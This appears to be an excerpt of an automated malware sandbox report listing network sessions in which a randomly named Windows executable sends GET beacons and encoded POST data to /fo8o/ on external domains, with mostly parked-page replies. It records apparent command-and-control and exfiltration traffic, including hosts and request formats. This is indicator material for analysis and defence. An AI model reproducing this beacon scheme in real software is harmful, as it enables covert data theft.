                                                                            Data Ascii: Ml18S=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhu3TmwMaqQmtLCpTU7xKGKP3HcqvykTiEiH6FDFj5Jcasr+T0YwLQ+63scTh2EfTsYnJxSsL0iqpX0x3KMDZuOQ8XdUDX9ahgBeBsj8nqth/skcqsLuQ+1mOs9JQJNfUA6Mhs29xlshdtuoGzsmXQupmdSO/oGT3Vgd2324a91k53tI0Jws9/rVsbP3tlS+hge466nemxKhCLoFSjUjve6J7CjcLk7CFwGpXz+l3cB7friBjuR5Zuy3du3b5vDDVuXEvyLtum9Es/4byXUgFcim6jhKS68fuBAb47Mmsz7dA6jsQTzKMUjGSoJdqV3EzZyCggY0Bh4iPiGAL3NldetnUQVL1Yjr4GYrd7XU6TDj35BzBTEYpMolA5ZCcT4SWFA+bUtmDJlg30J55XkZSmCbX/qwbKM9Ka3+Tj/fgA+CRtRd/gpkHDrHTYGV8DkPdFiQFphPsb/FQ2S01B9N4/U0wPnJa2KS/+NUJwcmEDWFod/UQ1ELvm0gWWXefqzZHNV2caLnfrPufUZ0QkAEwkca/x02C50CIJi85NeItp2if3s2ZW0DGDO6oFier+nhjfA6mRuoue9nqL80pZwh+2SvcEPDIpTOX9Qmo4DfC+GxeMxoEVI26LQf43JpeSoIFqGOSe/2pX3pW0KFN8k/ZwesIb1LpAuRxDE4pdXGAuUuHfs9ixlfN9YpWSzabXEqJUVTJ+CsUb2SRay3eaJPw51205OfbfzEr+yDbNQuHYeYtlEw9B+fGz7kDEnk7C9ElJC5kAHGhuhCBKHHyQhFMehTadkXcDDEgIRZeaF+VaKnQwNxi2spf1vuWNMkale/2RQ8Ei [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.44980585.159.66.93805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:50:25.662738085 CET514OUTGET /fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.magmadokum.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 22, 2024 07:51:26.986809969 CET194INHTTP/1.0 504 Gateway Time-out
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.44995691.195.240.94805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:51:32.514878035 CET779OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.rssnewscast.com
                                                                            Origin: http://www.rssnewscast.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 202
                                                                            Referer: http://www.rssnewscast.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 76 46 46 63 4e 4d 51 30 41 59 42 79 74 58 32 74 6a 4b 75 55 42 44 76 36 51 5a 4a 63 54 72 68 51 67 3d 3d
                                                                            Data Ascii: Ml18S=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pvFFcNMQ0AYBytX2tjKuUBDv6QZJcTrhQg==
                                                                            Nov 22, 2024 07:51:33.838655949 CET707INHTTP/1.1 405 Not Allowed
                                                                            date: Fri, 22 Nov 2024 06:51:33 GMT
                                                                            content-type: text/html
                                                                            content-length: 556
                                                                            server: Parking/1.0
                                                                            connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.44996291.195.240.94805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:51:35.161812067 CET799OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.rssnewscast.com
                                                                            Origin: http://www.rssnewscast.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 222
                                                                            Referer: http://www.rssnewscast.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6e 63 6e 58 51 39 52 51 57 6f 4c 68 64 68 6d 61 57 52 71 4e 62 73 30 53 75 50 4c 32 79 62 34 51 38 3d
                                                                            Data Ascii: Ml18S=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBncnXQ9RQWoLhdhmaWRqNbs0SuPL2yb4Q8=
                                                                            Nov 22, 2024 07:51:36.532432079 CET707INHTTP/1.1 405 Not Allowed
                                                                            date: Fri, 22 Nov 2024 06:51:36 GMT
                                                                            content-type: text/html
                                                                            content-length: 556
                                                                            server: Parking/1.0
                                                                            connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.44996891.195.240.94805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:51:37.822875977 CET10881OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.rssnewscast.com
                                                                            Origin: http://www.rssnewscast.com
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 10302
                                                                            Referer: http://www.rssnewscast.com/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 45 42 31 63 4c 75 6d 78 6a 67 59 41 33 54 30 33 6f 6d 56 6a 6d 6f 4b 79 67 5a 33 61 75 4a 31 66 71 45 79 69 50 6e 5a 53 4f 6d 6d 77 4e 56 51 65 68 4f 31 37 46 72 4f 37 79 4c 69 6c 5a 7a 4c 42 67 59 42 57 70 6b 47 69 6b 79 6e 4c 70 48 68 2f 7a 38 56 70 48 30 31 5a 43 30 31 41 4f 61 46 67 41 43 78 48 4b 39 42 72 38 6c 68 59 4a 54 48 2b 63 51 75 54 50 63 73 77 44 4f 61 77 57 72 65 57 4c 5a 52 4f 62 34 4f 51 4b 44 67 58 4f 70 41 7a 79 72 4d 76 4e 36 69 72 51 71 46 6a 42 68 48 72 55 64 [TRUNCATED]
                                                                            Data Ascii: Ml18S=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iEB1cLumxjgYA3T03omVjmoKygZ3auJ1fqEyiPnZSOmmwNVQehO17FrO7yLilZzLBgYBWpkGikynLpHh/z8VpH01ZC01AOaFgACxHK9Br8lhYJTH+cQuTPcswDOawWreWLZROb4OQKDgXOpAzyrMvN6irQqFjBhHrUdG+IfBSNHSw7v+5bGEfkwDUsG9V5WGoC8+lR/xvv5niBHs5YxnNEvaYLO5HaaXzr9Yoi2eNK/mdKdDN+RzeKqs47wiqJPC1ch3USWoPC2f24K9QCdu1AgunazsdP+QpazQx7ROXqz+lwJKNZe1kvu/mxYEQfuN9kDrDcltTEHs/QZJEUzYvBM6bQMuPz1dVQDMpPWMz/pduf5vOWC2xUc3fv3IBc7OeUD7MIk0bf9Gbm+VO95HMSMAUe3tB+KdjVkVILNTrcl4P4HGW2E+u48IR+g1ays+RI/C1NBPJwVSCGAYSflKEdDQBKYWPtT2CERNvS+q2+Z7hUDmlvZrTzNm2Xa5KVKa1Co/3jN8MoOr7PfQ9Ia5yGc9dX0kFiKjsKUxE/Vp034fjrgGf9Mkg85IeCp+cob6ky3EsKMYZRr5JOnBPv4sN4v9yE4ndesPT8b8SoR6UgELJDvJDVi/IhvwyqS2mqOgKwAIreImiSDx0GiMs4qDzJw5y0zfSaRYkLSbz1s7AuiTEa1VmruK0xGZNeu6oOxQ587MegUgAtQ8J0kU9gVp6LCofjZX6p/d/Sn2hXihM9v1sm4iR2/t0BqhfxFWHV9Cy56ml/sLPWr4/1az18opf8DsZa1q68AlxVyJil3gJlvL/2Qi+kje9jUQzWqR8g3SLA60Y [TRUNCATED]
                                                                            Nov 22, 2024 07:51:39.455666065 CET707INHTTP/1.1 405 Not Allowed
                                                                            date: Fri, 22 Nov 2024 06:51:38 GMT
                                                                            content-type: text/html
                                                                            content-length: 556
                                                                            server: Parking/1.0
                                                                            connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.44997491.195.240.94805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:51:40.490550041 CET515OUTGET /fo8o/?Ml18S=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&nVb4=q2L0IduHqXQ8JBmp HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.rssnewscast.com
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 22, 2024 07:51:42.053124905 CET1236INHTTP/1.1 200 OK
                                                                            date: Fri, 22 Nov 2024 06:51:41 GMT
                                                                            content-type: text/html; charset=UTF-8
                                                                            transfer-encoding: chunked
                                                                            vary: Accept-Encoding
                                                                            expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                            cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            pragma: no-cache
                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_unjBeewMUsBbtVhF2Zbre5aID80PATlFhdTM6YeSrrq3WEeZ8enPVW5cNWN0XiARcuWRCR1/A4+7uDEeA1prHw==
                                                                            last-modified: Fri, 22 Nov 2024 06:51:41 GMT
                                                                            x-cache-miss-from: parking-7ffff5845f-6gjhm
                                                                            server: Parking/1.0
                                                                            connection: close
                                                                            Data Raw: 32 45 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 75 6e 6a 42 65 65 77 4d 55 73 42 62 74 56 68 46 32 5a 62 72 65 35 61 49 44 38 30 50 41 54 6c 46 68 64 54 4d 36 59 65 53 72 72 71 33 57 45 65 5a 38 65 6e 50 56 57 35 63 4e 57 4e 30 58 69 41 52 63 75 57 52 43 52 31 2f 41 34 2b 37 75 44 45 65 41 31 70 72 48 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED]
                                                                            Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_unjBeewMUsBbtVhF2Zbre5aID80PATlFhdTM6YeSrrq3WEeZ8enPVW5cNWN0XiARcuWRCR1/A4+7uDEeA1prHw==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informati
                                                                            Nov 22, 2024 07:51:42.053143024 CET1236INData Raw: 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66
                                                                            Data Ascii: on youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchAECing for!"><link rel="icon" type="image/png" href="//img.
                                                                            Nov 22, 2024 07:51:42.053155899 CET1236INData Raw: 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d
                                                                            Data Ascii: ne-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sel
                                                                            Nov 22, 2024 07:51:42.053251982 CET1236INData Raw: 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e
                                                                            Data Ascii: h]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:n
                                                                            Nov 22, 2024 07:51:42.053262949 CET658INData Raw: 68 3a 39 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f
                                                                            Data Ascii: h:90%;min-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images
                                                                            Nov 22, 2024 07:51:42.053272963 CET1236INData Raw: 35 37 36 0d 0a 3a 23 30 61 34 38 66 66 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d
                                                                            Data Ascii: 576:#0a48ff}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-
                                                                            Nov 22, 2024 07:51:42.053283930 CET1236INData Raw: 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69
                                                                            Data Ascii: __content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.container-s17A2earchbox__button{border:0 none}.container-searchbox__button{cursor:p
                                                                            Nov 22, 2024 07:51:42.053296089 CET1236INData Raw: 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f
                                                                            Data Ascii: x}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactive{text-align:left;margin:0 15px;font-size:10px}.container-cookie-message
